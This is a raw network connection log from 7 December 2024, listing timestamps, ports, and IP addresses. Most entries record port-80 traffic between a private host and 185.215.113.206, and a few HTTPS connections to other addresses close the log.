Dec 7, 2024 10:51:18.913592100 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.913671970 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.913702011 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.913934946 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.914587975 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.914720058 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.914769888 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.915611029 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.915659904 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.915679932 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.915887117 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.916563988 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.916640043 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.916666031 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.916840076 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.917551994 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.917603016 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.917701960 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.917778015 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.918569088 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.918618917 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.918636084 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.918812990 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.919529915 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.919595003 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.919624090 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.919785023 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.920536995 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.920598984 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.920631886 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.921643019 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.921655893 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.921719074 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.921741009 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.922533035 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.922588110 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.922642946 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.922702074 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.923525095 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.923624039 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.923674107 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.924455881 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.924536943 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.974859953 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.974875927 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.974956036 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.975281000 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.975373030 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.975496054 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.975563049 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.976248980 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.976301908 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.976367950 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.976403952 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.977252960 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.977302074 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.977473974 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.977574110 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.978255033 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.978322983 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.978324890 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.978416920 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.979180098 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.979192972 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.979223967 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.979238033 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.980056047 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.980103016 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.980356932 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.980400085 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.981612921 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.981657982 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.981794119 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.981950045 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.982815981 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.982881069 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.982942104 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.982984066 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.983509064 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.983521938 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.983558893 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.983573914 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.984361887 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.984375000 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.984421015 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.985178947 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.985238075 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.985328913 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.985388994 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.986064911 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.986124039 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.986211061 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.986260891 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.987194061 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.987205982 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.987241030 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.987252951 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.987621069 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.987632990 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.987644911 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.987669945 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.987685919 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.987710953 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.988512993 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.988567114 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.988629103 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.988756895 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.989540100 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.989593029 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.989656925 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.989706039 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.990511894 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.990564108 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.990626097 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.990748882 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.991553068 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.991585016 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:18.991605997 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:18.991646051 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.040993929 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.041057110 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.041069984 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.041117907 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.041471958 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.041553020 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.041606903 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.042382002 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.042489052 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.042545080 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.043366909 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.043415070 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.043481112 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.043528080 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.044354916 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.044498920 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.044548988 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.045372963 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.045422077 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.045492887 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.045538902 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.046353102 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.046561956 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.046564102 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.046792984 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.047346115 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.047394991 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.047435999 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.047482014 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.048343897 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.048393965 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.048440933 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.048489094 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.049381971 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.049432039 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.049452066 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.049597025 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.095727921 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.095788956 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.095882893 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.095990896 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.096034050 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.096050978 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.096095085 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.096606970 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.096618891 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.096672058 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.097031116 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.097081900 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.097147942 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.097280025 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.097927094 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.097980976 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.098025084 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.098117113 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.098932028 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.098984957 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.099037886 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.099133015 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.099903107 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.099956989 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.100027084 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.100148916 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.100902081 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.100951910 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.100995064 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.101039886 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.101934910 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.101985931 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.102041960 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.102169991 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.102897882 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.102936983 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.102946997 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.103003979 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.103856087 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.103908062 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.103971004 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.104020119 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.104861021 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.104913950 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.104978085 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.105024099 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.105891943 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.105904102 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.105948925 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.106805086 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.106863022 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.106900930 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.106947899 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.107808113 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.107875109 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.107918024 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.107963085 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.108813047 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.108860970 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.108902931 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.108947992 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.110565901 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.110578060 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.110626936 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.110650063 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.110922098 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.111124992 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.111182928 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.111751080 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.111870050 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.111922026 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.113477945 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.113490105 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.113534927 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.113893032 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.113904953 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.113944054 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.113957882 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.114753008 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.114811897 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.114820004 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.114994049 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.115833044 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.115885973 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.115925074 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.115967989 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.116902113 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.116955996 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.165491104 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.165523052 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.165553093 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.165589094 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.165987015 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.166033983 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.166125059 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.166177034 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.166943073 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.167016983 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.167062044 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.167948961 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.168003082 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.168009043 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.168225050 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.168953896 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.169012070 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.169018984 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.169063091 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.169922113 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.169975042 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.169991970 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.170166016 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.170916080 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.170962095 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.171035051 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.171222925 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.171915054 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.171960115 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.172009945 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.172061920 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.172878027 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.172933102 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.172991037 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.173099995 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.173881054 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.173943043 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.173990965 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.174052954 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.174858093 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.174905062 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.174913883 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.174961090 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.175865889 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.175923109 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.175971031 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.176274061 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.176903009 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.176958084 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.176970005 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.177020073 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.177887917 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.177932024 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.177982092 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.178026915 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:19.178776979 CET	80	49713	185.215.113.206	192.168.2.6
Dec 7, 2024 10:51:19.178828001 CET	49713	80	192.168.2.6	185.215.113.206
Dec 7, 2024 10:51:20.075939894 CET	443	49720	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:20.076035976 CET	49720	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:20.078496933 CET	443	49721	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:20.078577042 CET	49721	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:20.145292044 CET	443	49719	23.206.197.17	192.168.2.6
Dec 7, 2024 10:51:20.145391941 CET	49719	443	192.168.2.6	23.206.197.17
Dec 7, 2024 10:51:20.183166027 CET	443	49722	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:20.183229923 CET	49722	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:20.263283014 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:20.263353109 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:20.294004917 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:20.294024944 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:20.294375896 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:20.306737900 CET	49718	443	192.168.2.6	13.107.246.63
Dec 7, 2024 10:51:20.347328901 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:20.403049946 CET	443	49723	150.171.27.10	192.168.2.6
Dec 7, 2024 10:51:20.403115034 CET	49723	443	192.168.2.6	150.171.27.10
Dec 7, 2024 10:51:20.550483942 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:20.550559998 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:20.550622940 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:20.550954103 CET	49725	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:20.550992012 CET	443	49725	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:20.551152945 CET	49726	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:20.551162958 CET	443	49726	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:20.551201105 CET	49725	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:20.551211119 CET	49726	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:20.553617954 CET	49726	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:20.553633928 CET	443	49726	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:20.553906918 CET	49725	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:20.553919077 CET	443	49725	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:20.554199934 CET	49724	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:20.554212093 CET	443	49724	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:20.602513075 CET	49730	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:20.602531910 CET	443	49730	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:20.602636099 CET	49730	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:20.604922056 CET	49730	443	192.168.2.6	142.250.181.68
Dec 7, 2024 10:51:20.604935884 CET	443	49730	142.250.181.68	192.168.2.6
Dec 7, 2024 10:51:20.739643097 CET	443	49718	13.107.246.63	192.168.2.6
Dec 7, 2024 10:51:20.739665985 CET	443	49718	13.107.246.63	192.168.2.6
